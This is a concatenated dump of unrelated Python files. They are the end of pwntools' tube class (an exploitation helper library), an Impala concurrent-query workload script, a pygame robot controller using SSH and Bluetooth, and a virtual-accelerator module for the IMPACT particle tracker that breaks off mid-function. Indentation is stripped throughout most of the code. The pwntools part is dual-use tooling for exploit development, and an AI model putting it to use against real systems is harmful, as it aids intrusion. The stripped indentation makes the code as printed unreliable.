return self.recvuntil(delim, timeout=timeout)
def sendlinethen(self, delim, data, timeout = default):
"""sendlinethen(delim, data, timeout = default) -> str
A combination of ``sendline(data)`` and ``recvuntil(delim, timeout=timeout)``."""
self.sendline(data)
return self.recvuntil(delim, timeout=timeout)
def interactive(self, prompt = term.text.bold_red('$') + ' '):
"""interactive(prompt = pwnlib.term.text.bold_red('$') + ' ')
Does simultaneous reading and writing to the tube. In principle this just
connects the tube to standard in and standard out, but in practice this
is much more usable, since we are using :mod:`pwnlib.term` to print a
floating prompt.
Thus it only works while in :data:`pwnlib.term.term_mode`.
"""
self.info('Switching to interactive mode')
go = threading.Event()
def recv_thread():
while not go.isSet():
try:
cur = self.recv(timeout = 0.05)
cur = cur.replace(self.newline, b'\n')
if cur:
stdout = sys.stdout
if not term.term_mode:
stdout = getattr(stdout, 'buffer', stdout)
stdout.write(cur)
stdout.flush()
except EOFError:
self.info('Got EOF while reading in interactive')
break
t = context.Thread(target = recv_thread)
t.daemon = True
t.start()
try:
while not go.isSet():
if term.term_mode:
data = term.readline.readline(prompt = prompt, float = True)
else:
stdin = getattr(sys.stdin, 'buffer', sys.stdin)
data = stdin.read(1)
if data:
try:
self.send(data)
except EOFError:
go.set()
self.info('Got EOF while sending in interactive')
else:
go.set()
except KeyboardInterrupt:
self.info('Interrupted')
go.set()
while t.is_alive():
t.join(timeout = 0.1)
def stream(self, line_mode=True):
"""stream()
Receive data until the tube exits, and print it to stdout.
Similar to :func:`interactive`, except that no input is sent.
Similar to ``print(tube.recvall())`` except that data is printed
as it is received, rather than after all data is received.
Arguments:
line_mode(bool): Whether to receive line-by-line or raw data.
Returns:
All data printed.
"""
buf = Buffer()
function = self.recvline if line_mode else self.recv
try:
while True:
buf.add(function())
stdout = sys.stdout
if not term.term_mode:
stdout = getattr(stdout, 'buffer', stdout)
stdout.write(buf.data[-1])
except KeyboardInterrupt:
pass
except EOFError:
pass
return buf.get()
def clean(self, timeout = 0.05):
"""clean(timeout = 0.05)
Removes all the buffered data from a tube by calling
:meth:`pwnlib.tubes.tube.tube.recv` with a low timeout until it fails.
If ``timeout`` is zero, only cached data will be cleared.
Note: If timeout is set to zero, the underlying network is
not actually polled; only the internal buffer is cleared.
Returns:
All data received
Examples:
>>> t = tube()
>>> t.unrecv(b'clean me up')
>>> t.clean(0)
b'clean me up'
>>> len(t.buffer)
0
"""
if timeout == 0:
return self.buffer.get()
return self.recvrepeat(timeout)
def clean_and_log(self, timeout = 0.05):
r"""clean_and_log(timeout = 0.05)
Works exactly as :meth:`pwnlib.tubes.tube.tube.clean`, but logs received
data with :meth:`pwnlib.self.info`.
Returns:
All data received
Examples:
>>> def recv(n, data=[b'', b'hooray_data']):
... while data: return data.pop()
>>> t = tube()
>>> t.recv_raw = recv
>>> t.connected_raw = lambda d: True
>>> t.fileno = lambda: 1234
>>> with context.local(log_level='info'):
... data = t.clean_and_log() #doctest: +ELLIPSIS
[DEBUG] Received 0xb bytes:
b'hooray_data'
>>> data
b'hooray_data'
>>> context.clear()
"""
with context.local(log_level='debug'):
return self.clean(timeout)
def connect_input(self, other):
"""connect_input(other)
Connects the input of this tube to the output of another tube object.
Examples:
>>> def p(x): print(x.decode())
>>> def recvone(n, data=[b'data']):
... while data: return data.pop()
... raise EOFError
>>> a = tube()
>>> b = tube()
>>> a.recv_raw = recvone
>>> b.send_raw = p
>>> a.connected_raw = lambda d: True
>>> b.connected_raw = lambda d: True
>>> a.shutdown = lambda d: True
>>> b.shutdown = lambda d: True
>>> import time
>>> _=(b.connect_input(a), time.sleep(0.1))
data
"""
def pump():
import sys as _sys
while self.countdown_active():
if not (self.connected('send') and other.connected('recv')):
break
try:
data = other.recv(timeout = 0.05)
except EOFError:
break
if not _sys:
return
if not data:
continue
try:
self.send(data)
except EOFError:
break
if not _sys:
return
self.shutdown('send')
other.shutdown('recv')
t = context.Thread(target = pump)
t.daemon = True
t.start()
def connect_output(self, other):
"""connect_output(other)
Connects the output of this tube to the input of another tube object.
Examples:
>>> def p(x): print(repr(x))
>>> def recvone(n, data=[b'data']):
... while data: return data.pop()
... raise EOFError
>>> a = tube()
>>> b = tube()
>>> a.recv_raw = recvone
>>> b.send_raw = p
>>> a.connected_raw = lambda d: True
>>> b.connected_raw = lambda d: True
>>> a.shutdown = lambda d: True
>>> b.shutdown = lambda d: True
>>> _=(a.connect_output(b), time.sleep(0.1))
b'data'
"""
other.connect_input(self)
def connect_both(self, other):
"""connect_both(other)
Connects the both ends of this tube object with another tube object."""
self.connect_input(other)
self.connect_output(other)
def spawn_process(self, *args, **kwargs):
"""Spawns a new process having this tube as stdin, stdout and stderr.
Takes the same arguments as :class:`subprocess.Popen`."""
return subprocess.Popen(
*args,
stdin = self.fileno(),
stdout = self.fileno(),
stderr = self.fileno(),
**kwargs
)
def __lshift__(self, other):
"""
Shorthand for connecting multiple tubes.
See :meth:`connect_input` for more information.
Examples:
The following are equivalent ::
tube_a << tube_b
tube_a.connect_input(tube_b)
This is useful when chaining multiple tubes ::
tube_a << tube_b << tube_a
tube_a.connect_input(tube_b)
tube_b.connect_input(tube_a)
"""
self.connect_input(other)
return other
def __rshift__(self, other):
"""
Inverse of the ``<<`` operator. See :meth:`__lshift__`.
See :meth:`connect_input` for more information.
"""
self.connect_output(other)
return other
def __ne__(self, other):
"""
Shorthand for connecting tubes to each other.
The following are equivalent ::
a >> b >> a
a <> b
See :meth:`connect_input` for more information.
"""
self << other << self
def wait_for_close(self):
"""Waits until the tube is closed."""
while self.connected():
time.sleep(0.05)
wait = wait_for_close
def can_recv(self, timeout = 0):
"""can_recv(timeout = 0) -> bool
Returns True, if there is data available within `timeout` seconds.
Examples:
>>> import time
>>> t = tube()
>>> t.can_recv_raw = lambda *a: False
>>> t.can_recv()
False
>>> _=t.unrecv(b'data')
>>> t.can_recv()
True
>>> _=t.recv()
>>> t.can_recv()
False
"""
return bool(self.buffer or self.can_recv_raw(timeout))
def settimeout(self, timeout):
"""settimeout(timeout)
Set the timeout for receiving operations. If the string "default"
is given, then :data:`context.timeout` will be used. If None is given,
then there will be no timeout.
Examples:
>>> t = tube()
>>> t.settimeout_raw = lambda t: None
>>> t.settimeout(3)
>>> t.timeout == 3
True
"""
self.timeout = timeout
shutdown_directions = {
'in': 'recv',
'read': 'recv',
'recv': 'recv',
'out': 'send',
'write': 'send',
'send': 'send',
}
connected_directions = shutdown_directions.copy()
connected_directions['any'] = 'any'
def shutdown(self, direction = "send"):
"""shutdown(direction = "send")
Closes the tube for further reading or writing depending on `direction`.
Arguments:
direction(str): Which direction to close; "in", "read" or "recv"
closes the tube in the ingoing direction, "out", "write" or "send"
closes it in the outgoing direction.
Returns:
:const:`None`
Examples:
>>> def p(x): print(x)
>>> t = tube()
>>> t.shutdown_raw = p
>>> _=list(map(t.shutdown, ('in', 'read', 'recv', 'out', 'write', 'send')))
recv
recv
recv
send
send
send
>>> t.shutdown('bad_value') #doctest: +ELLIPSIS
Traceback (most recent call last):
...
KeyError: "direction must be in ['in', 'out', 'read', 'recv', 'send', 'write']"
"""
try:
direction = self.shutdown_directions[direction]
except KeyError:
raise KeyError('direction must be in %r' % sorted(self.shutdown_directions))
else:
self.shutdown_raw(self.shutdown_directions[direction])
def connected(self, direction = 'any'):
"""connected(direction = 'any') -> bool
Returns True if the tube is connected in the specified direction.
Arguments:
direction(str): Can be the string 'any', 'in', 'read', 'recv',
'out', 'write', 'send'.
Doctest:
>>> def p(x): print(x)
>>> t = tube()
>>> t.connected_raw = p
>>> _=list(map(t.connected, ('any', 'in', 'read', 'recv', 'out', 'write', 'send')))
any
recv
recv
recv
send
send
send
>>> t.connected('bad_value') #doctest: +ELLIPSIS
Traceback (most recent call last):
...
KeyError: "direction must be in ['any', 'in', 'out', 'read', 'recv', 'send', 'write']"
"""
try:
direction = self.connected_directions[direction]
except KeyError:
raise KeyError('direction must be in %r' % sorted(self.connected_directions))
else:
return self.connected_raw(direction)
def __enter__(self):
"""Permit use of 'with' to control scoping and closing sessions.
Examples:
>>> t = tube()
>>> def p(x): print(x)
>>> t.close = lambda: p("Closed!")
>>> with t: pass
Closed!
"""
return self
def __exit__(self, type, value, traceback):
"""Handles closing for 'with' statement
See :meth:`__enter__`
"""
self.close()
# The minimal interface to be implemented by a child
def recv_raw(self, numb):
"""recv_raw(numb) -> str
Should not be called directly. Receives data without using the buffer
on the object.
Unless there is a timeout or closed connection, this should always
return data. In case of a timeout, it should return None; in case
of a closed connection it should raise an ``exceptions.EOFError``.
"""
raise EOFError('Not implemented')
def send_raw(self, data):
"""send_raw(data)
Should not be called directly. Sends data to the tube.
Should raise ``exceptions.EOFError`` if it is unable to send any
more because of a closed tube.
"""
raise EOFError('Not implemented')
def settimeout_raw(self, timeout):
"""settimeout_raw(timeout)
Should not be called directly. Sets the timeout for
the tube.
"""
raise NotImplementedError()
def timeout_change(self):
"""
Informs the raw layer of the tube that the timeout has changed.
Should not be called directly.
Inherited from :class:`Timeout`.
"""
try:
self.settimeout_raw(self.timeout)
except NotImplementedError:
pass
def can_recv_raw(self, timeout):
"""can_recv_raw(timeout) -> bool
Should not be called directly. Returns True, if
there is data available within the timeout, but
ignores the buffer on the object.
"""
raise NotImplementedError()
def connected_raw(self, direction):
"""connected(direction = 'any') -> bool
Should not be called directly. Returns True iff the
tube is connected in the given direction.
"""
raise NotImplementedError()
def close(self):
"""close()
Closes the tube.
"""
pass
# Ideally we could:
# raise NotImplementedError()
# But this causes issues with the unit tests.
def fileno(self):
"""fileno() -> int
Returns the file number used for reading.
"""
raise NotImplementedError()
def shutdown_raw(self, direction):
"""shutdown_raw(direction)
Should not be called directly. Closes the tube for further reading or
writing.
"""
raise NotImplementedError()
def p64(self, *a, **kw): return self.send(packing.p64(*a, **kw))
def p32(self, *a, **kw): return self.send(packing.p32(*a, **kw))
def p16(self, *a, **kw): return self.send(packing.p16(*a, **kw))
def p8(self, *a, **kw): return self.send(packing.p8(*a, **kw))
def pack(self, *a, **kw): return self.send(packing.pack(*a, **kw))
def u64(self, *a, **kw): return packing.u64(self.recvn(8), *a, **kw)
def u32(self, *a, **kw): return packing.u32(self.recvn(4), *a, **kw)
def u16(self, *a, **kw): return packing.u16(self.recvn(2), *a, **kw)
def u8(self, *a, **kw): return packing.u8(self.recvn(1), *a, **kw)
def unpack(self, *a, **kw): return packing.unpack(self.recvn(context.bytes), *a, **kw)
def flat(self, *a, **kw): return self.send(packing.flat(*a,**kw))
def fit(self, *a, **kw): return self.send(packing.fit(*a, **kw))
# Dynamic functions
def make_wrapper(func):
def wrapperb(self, *a, **kw):
return bytearray(func(self, *a, **kw))
def wrapperS(self, *a, **kw):
return context._encode(func(self, *a, **kw))
wrapperb.__doc__ = 'Same as :meth:`{func.__name__}`, but returns a bytearray'.format(func=func)
wrapperb.__name__ = func.__name__ + 'b'
wrapperS.__doc__ = 'Same as :meth:`{func.__name__}`, but returns a str, ' \
'decoding the result using `context.encoding`. ' \
'(note that the binary versions are way faster)'.format(func=func)
wrapperS.__name__ = func.__name__ + 'S'
return wrapperb, wrapperS
for func in [recv,
recvn,
recvall,
recvrepeat,
recvuntil,
recvpred,
recvregex,
recvline,
recvline_contains,
recvline_startswith,
recvline_endswith,
recvline_regex]:
for wrapper in make_wrapper(func):
locals()[wrapper.__name__] = wrapper
def make_wrapper(func, alias):
def wrapper(self, *a, **kw):
return func(self, *a, **kw)
wrapper.__doc__ = 'Alias for :meth:`{func.__name__}`'.format(func=func)
wrapper.__name__ = alias
return wrapper
for _name in list(locals()):
if 'recv' in _name:
_name2 = _name.replace('recv', 'read')
elif 'send' in _name:
_name2 = _name.replace('send', 'write')
else:
continue
locals()[_name2] = make_wrapper(locals()[_name], _name2)
# Clean up the scope
del wrapper, func, make_wrapper, _name, _name2
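# Minimal sketch (not part of pwnlib): a child class only needs to implement the raw
# interface above (here send_raw/recv_raw over an in-memory loopback buffer) and all
# of the inherited recv*/send* helpers work on top of it.
if __name__ == '__main__':
    class loopback(tube):
        def __init__(self, *a, **kw):
            super(loopback, self).__init__(*a, **kw)
            self._pending = b''
        def send_raw(self, data):
            # Raw writes just append to the loopback buffer.
            self._pending += data
        def recv_raw(self, numb):
            # Raw reads hand back up to `numb` buffered bytes, or signal EOF.
            if not self._pending:
                raise EOFError
            chunk, self._pending = self._pending[:numb], self._pending[numb:]
            return chunk
    t = loopback()
    t.sendline(b'hello')
    print(t.recvline())  # b'hello\n'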
|
concurrent_workload.py
|
#!/usr/bin/env impala-python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# This class can be used to drive a concurrent workload against a local minicluster
import argparse
import logging
# Needed to work around datetime threading bug:
# https://stackoverflow.com/questions/32245560/module-object-has-no-attribute-strptime-with-several-threads-python
import _strptime # noqa: F401
import sys
import time
from Queue import Queue
from threading import current_thread, Event, Thread
from tests.common.impala_cluster import ImpalaCluster
class ConcurrentWorkload(object):
"""This class can be used to drive concurrent streams of queries against a cluster. It
is useful when trying to carefully control the number of queries running on a cluster
concurrently. The queries typically involve some sleep statement to allow for larger
numbers of concurrently running queries.
This class should not be used for performance benchmarks, e.g. to evaluate query
throughput.
Users of this class need to make sure to call start() and stop(). Optionally, the class
supports printing the current throughput rate. The class also requires that the first
node in the cluster is a dedicated coordinator and it must already be running when
calling start().
"""
def __init__(self, query, num_streams):
self.query = query
self.num_streams = num_streams
self.stop_ev = Event()
self.output_q = Queue()
self.threads = []
self.query_rate = 0
self.query_rate_thread = Thread(target=self.compute_query_rate,
args=(self.output_q, self.stop_ev))
def execute(self, query):
"""Executes a query on the coordinator of the local minicluster."""
cluster = ImpalaCluster.get_e2e_test_cluster()
if len(cluster.impalads) == 0:
raise Exception("Coordinator not running")
client = cluster.get_first_impalad().service.create_hs2_client()
return client.execute(query)
def loop_query(self, query, output_q, stop_ev):
"""Executes 'query' in a loop while 'stop_ev' is not set and inserts the result into
'output_q'."""
while not stop_ev.is_set():
try:
output_q.put(self.execute(query))
except Exception:
if not stop_ev.is_set():
stop_ev.set()
logging.exception("Caught error, stopping")
logging.info("%s exiting" % current_thread().name)
def compute_query_rate(self, queue, stop_ev):
"""Computes the query throughput rate in queries per second averaged over the last 5
seconds. This method only returns when 'stop_ev' is set by the caller."""
AVG_WINDOW_S = 5
times = []
while not stop_ev.is_set():
# Don't block to check for stop_ev
if queue.empty():
time.sleep(0.1)
continue
queue.get()
now = time.time()
times.append(now)
# Keep only timestamps within the averaging window
start = now - AVG_WINDOW_S
times = [t for t in times if t >= start]
self.query_rate = float(len(times)) / AVG_WINDOW_S
def get_query_rate(self):
"""Returns the query rate as computed by compute_query_rate. This is thread-safe
because assignments in Python are atomic."""
return self.query_rate
def start(self):
"""Starts worker threads to execute queries."""
# Start workers
for i in xrange(self.num_streams):
t = Thread(target=self.loop_query, args=(self.query, self.output_q, self.stop_ev))
self.threads.append(t)
t.start()
self.query_rate_thread.start()
def print_query_rate(self):
"""Prints the current query throughput until user presses ctrl-c."""
try:
self._print_query_rate(self.output_q, self.stop_ev)
except KeyboardInterrupt:
self.stop()
assert self.stop_ev.is_set(), "Stop event expected to be set but it isn't"
def _print_query_rate(self, queue, stop_ev):
"""Prints the query throughput rate until 'stop_ev' is set by the caller."""
PERIOD_S = 1
print_time = time.time()
while not stop_ev.is_set():
sys.stdout.write("\rQuery rate %.2f/s" % self.query_rate)
sys.stdout.flush()
print_time += PERIOD_S
time.sleep(print_time - time.time())
sys.stdout.write("\n")
def stop(self):
"""Stops all worker threads and waits for them to finish."""
if self.stop_ev is None or self.stop_ev.is_set():
return
self.stop_ev.set()
# Wait for all workers to exit
for t in self.threads:
logging.info("Waiting for %s" % t.name)
t.join()
self.threads = []
if self.query_rate_thread:
self.query_rate_thread.join()
self.query_rate = None
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-q", "--query", help="Run this query",
default="select * from functional_parquet.alltypestiny "
"where month < 3 and id + random() < sleep(500);")
parser.add_argument("-n", "--num_streams", help="Run this many in parallel", type=int,
default=5)
args = parser.parse_args()
# Restrict logging so it doesn't interfere with print_query_rate()
logging.basicConfig(level=logging.INFO)
# Also restrict other modules' debug output
logging.getLogger("impala_cluster").setLevel(logging.INFO)
logging.getLogger("impala_connection").setLevel(logging.WARNING)
logging.getLogger("impala.hiveserver2").setLevel(logging.CRITICAL)
s = ConcurrentWorkload(args.query, args.num_streams)
s.start()
s.print_query_rate()
if __name__ == "__main__":
main()
|
event_handler.py
|
import pygame
import sys
import core_communication
import socket
from multiprocessing import Process
from pygame.locals import *
def start_server():
execfile("server.py")
class EventLogic:
def __init__(self, _game_state, _game_gui):
self._game_state = _game_state
self._game_gui = _game_gui
self.ssh_talk = core_communication.SSHCommunication()
self.bluetooth_talk = core_communication.BluetoothCommunication()
self.movement = {
K_UP: 8,
K_DOWN: 2,
K_RIGHT: 6,
K_LEFT: 4
}
def steer(self, direction):
if direction == K_UP:
self.bluetooth_talk.command("8")
elif direction == K_RIGHT:
self.bluetooth_talk.command("4")
elif direction == K_LEFT:
self.bluetooth_talk.command("6")
elif direction == K_DOWN:
self.bluetooth_talk.command("2")
def quit(self):
pygame.quit()
sys.exit()
def get_ip_address(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def event_handler(self):
event = pygame.event.poll()
if event.type == MOUSEBUTTONUP:
if self._game_state.get_state() == "welcome":
if self._game_gui.new.get_rect().collidepoint(event.pos):
self._game_state.set_state("new season")
self.ssh_talk.connect()
self.ssh_talk.command("sudo python client1.py %s" % self.get_ip_address())
self.bluetooth_talk.connect()
serverProcess = Process(target=start_server)
serverProcess.start()
elif self._game_gui.help.get_rect().collidepoint(event.pos):
self._game_state.set_state("help")
elif self._game_gui.author.get_rect().collidepoint(event.pos):
self._game_state.set_state("author")
elif self._game_gui.setting.get_rect().collidepoint(event.pos):
self._game_state.set_state("setting")
elif self._game_gui.quit.get_rect().collidepoint(event.pos):
self.quit()
elif self._game_state.get_state() == "new season":
if self._game_gui.back.get_rect().collidepoint(event.pos):
self.ssh_talk.disconnect()
self.bluetooth_talk.disconnect()
self._game_state.set_state("welcome")
elif self._game_state.get_state() == "setting":
if self._game_gui.back.get_rect().collidepoint(event.pos):
self._game_state.set_state("welcome")
elif self._game_gui.prompt_rect.collidepoint(event.pos):
self._game_gui.set_typing_tag(True)
elif self._game_gui.save.get_rect().collidepoint(event.pos):
self.ssh_talk.specify_port(int(self._game_gui.prompt.output()[0]))
self._game_gui.prompt.reset()
else:
self._game_gui.set_typing_tag(False)
elif self._game_state.get_state() == "error":
if self._game_gui.back.get_rect().collidepoint(event.pos):
self._game_state.set_state("welcome")
elif self._game_state.get_state() in ["help", "author", "setting"]:
if self._game_gui.back.get_rect().collidepoint(event.pos):
self._game_state.set_state("welcome")
elif event.type == MOUSEMOTION or event.type == NOEVENT:
if self._game_gui.buttons:
self._game_gui.draw(self._game_state.get_state())
for button in self._game_gui.buttons:
button.set_bold(pygame.mouse.get_pos())
pygame.display.update()
elif event.type == pygame.QUIT:
self.quit()
elif event.type == KEYDOWN:
if event.key == K_ESCAPE:
self.quit()
elif event.key in [K_UP, K_DOWN, K_LEFT, K_RIGHT]:
if self._game_state.get_state() == "new season":
while True:
self._game_gui.modify_pos_pad(self.movement[event.key])
self.steer(event.key)
self.event_handler()
if pygame.key.get_pressed()[event.key] == 0:
break
elif event.key in range(48, 58) or event.key in range(256, 266):
if self._game_state.get_state() == "setting":
if self._game_gui.typing_tag:
if event.key < 100:
char = str(event.key-48)
elif event.key < 300:
char = str(event.key-256)
self._game_gui.prompt.take_char(char)
elif event.key == K_BACKSPACE:
self._game_gui.prompt.take_char("del")
|
impact.py
|
# encoding: UTF-8
"""Library for running an EPICS-based virtual accelertor using IMPACT particle tracker."""
import cothread
import logging
import math
import numpy
import os.path
import random
import re
import shutil
import subprocess
import tempfile
import threading
import time
from collections import OrderedDict
from copy import deepcopy
from cothread import catools
from phantasy.library.lattice.impact import LatticeFactory, OUTPUT_MODE_DIAG
from phantasy.library.layout import BCMElement
from phantasy.library.layout import BLElement
from phantasy.library.layout import BLMElement
from phantasy.library.layout import BPMElement
from phantasy.library.layout import BendElement
from phantasy.library.layout import CavityElement
from phantasy.library.layout import CorElement
from phantasy.library.layout import DriftElement
from phantasy.library.layout import PMElement
from phantasy.library.layout import PortElement
from phantasy.library.layout import QuadElement
from phantasy.library.layout import SeqElement
from phantasy.library.layout import SextElement
from phantasy.library.layout import SolCorElement
from phantasy.library.layout import StripElement
from phantasy.library.layout import ValveElement
from phantasy.library.parser import Configuration
__copyright__ = "Copyright (c) 2015, Facility for Rare Isotope Beams"
__author__ = "Dylan Maxwell"
# configuration options
CONFIG_MACHINE = "machine"
CONFIG_IMPACT_EXE_FILE = "impact_exe_file"
CONFIG_IMPACT_DATA_DIR = "impact_data_dir"
# default values
_DEFAULT_IMPACT_EXE = "impact"
_TEMP_DIRECTORY_SUFFIX = "_va_impact"
_DEFAULT_ERROR_VALUE = 0.0
_VA_STATUS_GOOD = "OK"
_VA_STATUS_BAD = "ERR"
# global logger instance
_LOGGER = logging.getLogger(__name__)
# global virtual accelerator
_VIRTUAL_ACCELERATOR = None
def start(layout, **kwargs):
"""Start the global virtual accelerator.
Parameters
----------
layout :
Accelerator layout object.
Keyword Arguments
-----------------
settings :
Dictionary of machine settings.
channels :
List of channel tuples with (name, properties, tags).
start :
Name of accelerator element to start simulation.
end :
Name of accelerator element to end simulation.
data_dir :
Path of directory containing IMPACT data files.
work_dir :
Path of directory for execution of IMPACT.
"""
global _VIRTUAL_ACCELERATOR
if _VIRTUAL_ACCELERATOR is None:
_VIRTUAL_ACCELERATOR = build_virtaccel(layout, **kwargs)
if _VIRTUAL_ACCELERATOR.is_started():
raise RuntimeError("Virtual Accelerator already started")
_VIRTUAL_ACCELERATOR.start()
def stop():
"""Stop the global virtual accelerator.
"""
global _VIRTUAL_ACCELERATOR
if _VIRTUAL_ACCELERATOR is None or not _VIRTUAL_ACCELERATOR.is_started():
raise RuntimeError("Virtual Accelerator not started")
_VIRTUAL_ACCELERATOR.stop()
def build_virtaccel(layout, **kwargs):
"""Convenience method to build a virtual accelerator.
Parameters
----------
layout :
Accelerator layout object
Keyword Arguments
-----------------
settings :
Dictionary of machine settings
channels :
List of channel tuples with (name, properties, tags)
start :
Name of accelerator element to start simulation
end :
Name of accelerator element to end simulation
data_dir :
Path of directory containing IMPACT data files
work_dir :
Path of directory for execution of IMPACT
Returns
-------
ret :
VirtualAccelerator instance
"""
va_factory = VirtualAcceleratorFactory(layout, **kwargs)
return va_factory.build()
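# Minimal usage sketch (not executable as-is): the layout, configuration, settings
# and channel list are assumed to come from the site-specific machine description
# and are only placeholders here.
#
#     va = build_virtaccel(layout, config=config, settings=settings,
#                          channels=channels, data_dir="/path/to/impact/data")
#     va.start()
#     ...   # the virtual accelerator now serves the configured EPICS channels
#     va.stop()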
class VirtualAcceleratorFactory(object):
"""Prepare a VirtualAccelerator for execution.
The main purpose of this class is to process the accelerator
description and configure the VirtualAccelerator for proper
execution.
"""
def __init__(self, layout, **kwargs):
self.layout = layout
self.config = kwargs.get("config", None)
self.settings = kwargs.get("settings", None)
self.channels = kwargs.get("channels", None)
self.start = kwargs.get("start", None)
self.end = kwargs.get("end", None)
self.data_dir = kwargs.get("data_dir", None)
self.work_dir = kwargs.get("work_dir", None)
@property
def layout(self):
return self._layout
@layout.setter
def layout(self, layout):
if not isinstance(layout, SeqElement):
raise TypeError("VirtAccelFactory: 'layout' property much be type SeqElement")
self._layout = layout
@property
def start(self):
return self._start
@start.setter
def start(self, start):
if (start is not None) and not isinstance(start, str):
raise TypeError("VirtAccelFactory: 'start' property much be type string or None")
self._start = start
@property
def end(self):
return self._end
@end.setter
def end(self, end):
if (end is not None) and not isinstance(end, str):
raise TypeError("VirtAccelFactory: 'end' property much be type string or None")
self._end = end
@property
def config(self):
return self._config
@config.setter
def config(self, config):
if not isinstance(config, Configuration):
raise TypeError("LatticeFactory: 'config' property must be type Configuration")
self._config = config
@property
def settings(self):
return self._settings
@settings.setter
def settings(self, settings):
if not isinstance(settings, dict):
raise TypeError("VirtAccelFactory: 'settings' property much be type dict")
self._settings = settings
@property
def channels(self):
return self._channels
@channels.setter
def channels(self, channels):
if not isinstance(channels, list):
raise TypeError("VirtAccelFactory: 'channels' property much be type list")
self._channels = channels
@property
def machine(self):
return self._machine
@machine.setter
def machine(self, machine):
if (machine is not None) and not isinstance(machine, str):
raise TypeError("VirtAccelFactory: 'machine' property much be type string or None")
self._machine = machine
@property
def data_dir(self):
return self._data_dir
@data_dir.setter
def data_dir(self, data_dir):
if (data_dir is not None) and not isinstance(data_dir, str):
raise TypeError("VirtAccelFactory: 'data_dir' property much be type string or None")
self._data_dir = data_dir
@property
def work_dir(self):
return self._work_dir
@work_dir.setter
def work_dir(self, work_dir):
if (work_dir is not None) and not isinstance(work_dir, str):
raise TypeError("VirtAccelFactory: 'work_dir' property much be type string or None")
self._work_dir = work_dir
def _get_config_impact_exe(self):
if self.config.has_default(CONFIG_IMPACT_EXE_FILE):
return self.config.getabspath_default(CONFIG_IMPACT_EXE_FILE, cmd=True)
return _DEFAULT_IMPACT_EXE
def _findChannel(self, name, field, handle):
for channel, props, _ in self.channels:
if props["elemName"] != name:
continue
if props["elemField"] != field:
continue
if props["elemHandle"] != handle:
continue
# IMPORTANT: Channel names originating from channel finder
# may be of type 'unicode' instead of 'str'. The cothread
# library does not have proper support for unicode strings.
return str(channel)
raise RuntimeError("VirtAccelFactory: channel not found: '{}', '{}', '{}'".format(name, field, handle))
def build(self):
"""Process the accelerator description and configure the Virtual Accelerator.
"""
settings = self.settings
data_dir = self.data_dir
if (data_dir is None) and self.config.has_default(CONFIG_IMPACT_DATA_DIR):
data_dir = self.config.getabspath_default(CONFIG_IMPACT_DATA_DIR)
if data_dir is None:
raise RuntimeError("VirtAccelFactory: No data directory provided, check the configuration")
work_dir = self.work_dir
impact_exe = self._get_config_impact_exe()
latfactory = LatticeFactory(self.layout, config=self.config, settings=self.settings)
latfactory.outputMode = OUTPUT_MODE_DIAG
latfactory.start = self.start
latfactory.end = self.end
m = re.match("(.*:)?(.*):(.*):(.*)", self.channels[0][0])
if not m:
raise RuntimeError("VirtAccelFactory: Error determining channel prefix, check channel names")
if m.group(1) is None:
chanprefix = None
else:
# IMPORTANT: chanprefix must
# be converted from unicode
chanprefix = str(m.group(1))
va = VirtualAccelerator(latfactory, settings, chanprefix, impact_exe, data_dir, work_dir)
for elem in self.layout.iter(start=self.start, end=self.end):
if isinstance(elem, CavityElement):
# Need to normalize cavity phase settings to 0~360
settings[elem.name][elem.fields.phase] = _normalize_phase(settings[elem.name][elem.fields.phase])
va.append_rw(self._findChannel(elem.name, elem.fields.phase, "setpoint"),
self._findChannel(elem.name, elem.fields.phase, "readset"),
self._findChannel(elem.name, elem.fields.phase, "readback"),
(elem.name, elem.fields.phase), desc="Cavity Phase", egu="degree", drvh=360, drvl=0)
va.append_rw(self._findChannel(elem.name, elem.fields.amplitude, "setpoint"),
self._findChannel(elem.name, elem.fields.amplitude, "readset"),
self._findChannel(elem.name, elem.fields.amplitude, "readback"),
(elem.name, elem.fields.amplitude), desc="Cavity Amplitude", egu="%")
va.append_elem(elem)
elif isinstance(elem, SolCorElement):
va.append_rw(self._findChannel(elem.name, elem.fields.field, "setpoint"),
self._findChannel(elem.name, elem.fields.field, "readset"),
self._findChannel(elem.name, elem.fields.field, "readback"),
(elem.name, elem.fields.field), desc="Solenoid Field", egu="T") # , drvratio=0.10)
va.append_rw(self._findChannel(elem.h.name, elem.h.fields.angle, "setpoint"),
self._findChannel(elem.h.name, elem.h.fields.angle, "readset"),
self._findChannel(elem.h.name, elem.h.fields.angle, "readback"),
(elem.h.name, elem.h.fields.angle), desc="Horizontal Corrector",
egu="radian") # , drvabs=0.001)
va.append_rw(self._findChannel(elem.v.name, elem.v.fields.angle, "setpoint"),
self._findChannel(elem.v.name, elem.v.fields.angle, "readset"),
self._findChannel(elem.v.name, elem.v.fields.angle, "readback"),
(elem.v.name, elem.v.fields.angle), desc="Vertical Corrector",
egu="radian") # , drvabs=0.001)
va.append_elem(elem)
elif isinstance(elem, CorElement):
va.append_rw(self._findChannel(elem.h.name, elem.h.fields.angle, "setpoint"),
self._findChannel(elem.h.name, elem.h.fields.angle, "readset"),
self._findChannel(elem.h.name, elem.h.fields.angle, "readback"),
(elem.h.name, elem.h.fields.angle), desc="Horizontal Corrector",
egu="radian") # , drvabs=0.001)
va.append_rw(self._findChannel(elem.v.name, elem.v.fields.angle, "setpoint"),
self._findChannel(elem.v.name, elem.v.fields.angle, "readset"),
self._findChannel(elem.v.name, elem.v.fields.angle, "readback"),
(elem.v.name, elem.v.fields.angle), desc="Vertical Corrector",
egu="radian") # , drvabs=0.001)
va.append_elem(elem)
elif isinstance(elem, BendElement):
va.append_rw(self._findChannel(elem.name, elem.fields.field, "setpoint"),
self._findChannel(elem.name, elem.fields.field, "readset"),
self._findChannel(elem.name, elem.fields.field, "readback"),
(elem.name, elem.fields.field), desc="Bend Relative Field", egu="none") # , drvratio=0.10)
va.append_elem(elem)
elif isinstance(elem, QuadElement):
